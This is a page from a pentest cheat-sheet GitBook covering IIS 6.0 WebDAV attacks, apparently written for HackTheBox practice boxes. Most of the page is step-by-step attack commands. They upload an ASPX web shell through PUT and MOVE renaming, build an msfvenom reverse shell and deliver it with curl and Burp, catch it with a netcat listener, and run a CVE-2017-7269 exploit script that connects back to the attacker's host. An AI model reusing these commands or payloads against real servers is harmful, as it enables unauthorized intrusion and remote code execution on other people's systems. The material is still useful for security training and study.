Pentest
  • Homepage
  • Pentest Links
  • 01 Prep
    • Target Inventory
    • OSINT and Dorks
    • Recon-ng dns zone snoop
    • ❤️Gitbook
  • 02 Scan
    • *Favorites
    • Burp
    • Dirb nikto wpscan etc
    • Enum Finger and Brute SSH
    • Fuzzing
    • Nmap
    • Open Port Checks OneLiner
    • Port Knocking
    • SSL Issues
    • Tcpdump
  • 03 Getting In
    • Char Evasion Tricks
    • Email SMTP
    • Eternal Blue
    • FTP
    • heartbleed
    • Metasploit
    • MySql
    • NFS
    • Oracle
    • Postgres
    • PowerShell Empire
    • Shells
    • rpc
    • SMB Samba
    • SSH Tips
    • SQLite3
    • Veil
  • 04 WebApps
    • Apache
    • Blogs
    • Coldfusion
    • Content Management (CMS)
    • Drupal
    • Elastix FreePBX
    • HttpFileServer (HFS)
    • IIS
    • IIS6 WebDav
    • Local File Inclusion (LFI)
    • Magento
    • Nagios
    • PFSense
    • php
    • php type juggling
    • phpLite
    • Web Injections
    • Javascript
    • Shellshock
    • SQL Injections (sqli)
    • SQLMap
    • WAF
    • Webmin
    • Web Scrape
    • Wordpress
  • 05 Passwords & Ciphers
    • Cipher Decrypt
    • Cipher RSA Wiener P-Q-E
    • Cracking
    • Dict Guess List Mangle
    • Get Hashes
    • Hydra Brutes
    • Images Exif Steg
    • Malware Analysis
    • Pull Hashes PCredz
    • SSH PrivKey Passphrase
    • Unzip Crack
    • Windows PW
  • 06 Linux PrivEsc
    • 1 Look Around
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • binaries
    • Buffer Overflow
    • bash prison
    • Monitor Files
    • mongodb node
    • Pivots
    • Remote Execute
    • Shell TTY Fix
    • TAR backups
    • Transfer Files
    • vnc
  • 07 Windows PrivEsc
    • 1 Windows cmd kungfu
    • 2 Enums
    • 3 PrivEsc
    • 4 Kernel Exploits
    • 5 Looting
    • Bloodhound
    • DLL Hijack MSF
    • Kerberos
    • Memory Analysis
    • NTDS
    • Powershell
    • Responder
    • Saved Creds runas
Powered by GitBook
On this page
  • Microsoft Windows 2003|2008|XP
  • nmap finds webdav
  • davtest
  • cadaver
  • PUT/MOVE
  • Burp
  • iis6-exploit
  • Windows 2003

Was this helpful?

  1. 04 WebApps

IIS6 WebDav

PreviousIISNextLocal File Inclusion (LFI)

Last updated 2 years ago

Was this helpful?

Microsoft Windows 2003|2008|XP

  • google 'iis 6.0 reverse shell'

  • Microsoft-IIS/6.0

  • http-webdav-scan

  • WebDAV allows clients to perform Web authoring operations remotely.

  • REF:

nmap finds webdav

  • nmap -sV -sC -oA nmap 10.x.x.x

  • Allowed Methods: OPTIONS, TRACE, GET, HEAD, COPY, PROPFIND, SEARCH, LOCK, UNLOCK

  • Options: OPTIONS, TRACE, GET, HEAD, DELETE, PUT, POST, COPY, MOVE

  • GET - download

  • PUT - upload

  • MOVE - you can rename/move

davtest

> davtest -url http://10.x.x.x

cadaver

> cadaver http://10.x.x.x
d> ls                          ..list
d> put shell.aspx              ..403 Forbidden
d> put shell.txt               ..ok
d> move shell.txt shell.aspx   ..ok

PUT/MOVE

  • Scenario:

    • Can 'put' text - upload

    • NOT 'put' aspx

    • Can 'move' aspx

------------------
Test:
curl -X PUT http://10.x.x.x/hello.txt -d @hello.txt
curl http://10.x.x.x/hello.txt

------------------
webshell:
cp /usr/share/webshells/aspx/cmdasp.aspx .
curl -X PUT http://10.x.x.x/payload.txt -d @cmdasp.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/payload.aspx' http://10.x.x.x/payload.txt
http://10.x.x.x/payload.aspx
Command: whoami 'execute' button
network service

------------------
reverse:
msfvenom -p windows/shell_reverse_tcp LHOST= LPORT=4444 -f aspx > reverse.aspx
curl -X PUT http://10.x.x.x/reverse.txt --data-binary @reverse.aspx
curl -X MOVE -H 'Destination:http://10.x.x.x/reverse.aspx' http://10.x.x.x/reverse.txt
curl http://10.x.x.x/reverse.aspx
http://10.x.x.x/reverse.aspx
nc -nlvp 4444

Burp

Proxy 10.x.x.x: 80
Burp > Intercept
PUT  > Send to repeater
PUT /ippsec.html HTTP/1.1
this is a test
http://10.x.x.x/ippsec.html  .. works!

msfvenom -p windows/shell_reverse_tcp LHOST=10.x.x.x LPORT=4444 -f aspx
copy/paste the text of aspx msfvenom
paste into burp (bottom)
PUT /ippsec.html HTTP/1.1    ..html ok
PUT /ippsec.aspx HTTP/1.1    ..aspx forbidden!

OPTIONS / HTTP/1.1           ..shows list of webdav options
MOVE /ippsec.html HTTP/1.1   ..move html
Destination: /ippsec.aspx    ..aspx!
http://10.x.x.x/ippsec.aspx
nc -nvlp 4444
Connected!

iis6-exploit

  • CVE-2017-7269

  • iis_shell.py

  • iis6-exploit-2017-CVE-2017-7269

  • usage: iis6webdav.py RHOST RPORT LHOST LPORT

> nc -nvlp 4444
> python ./iis6webdav.py 10.x.x.tgt 80 10.x.x.me 4444

Windows 2003

Windows Server 2003 and IIS 6.0 privledge escalation using impersonation: https://www.exploit-db.com/exploits/6705/

Granny/Grandpa-HTB
https://github.com/ohpe/juicy-potato/releases
https://github.com/g0rx/iis6-exploit-2017-CVE-2017-7269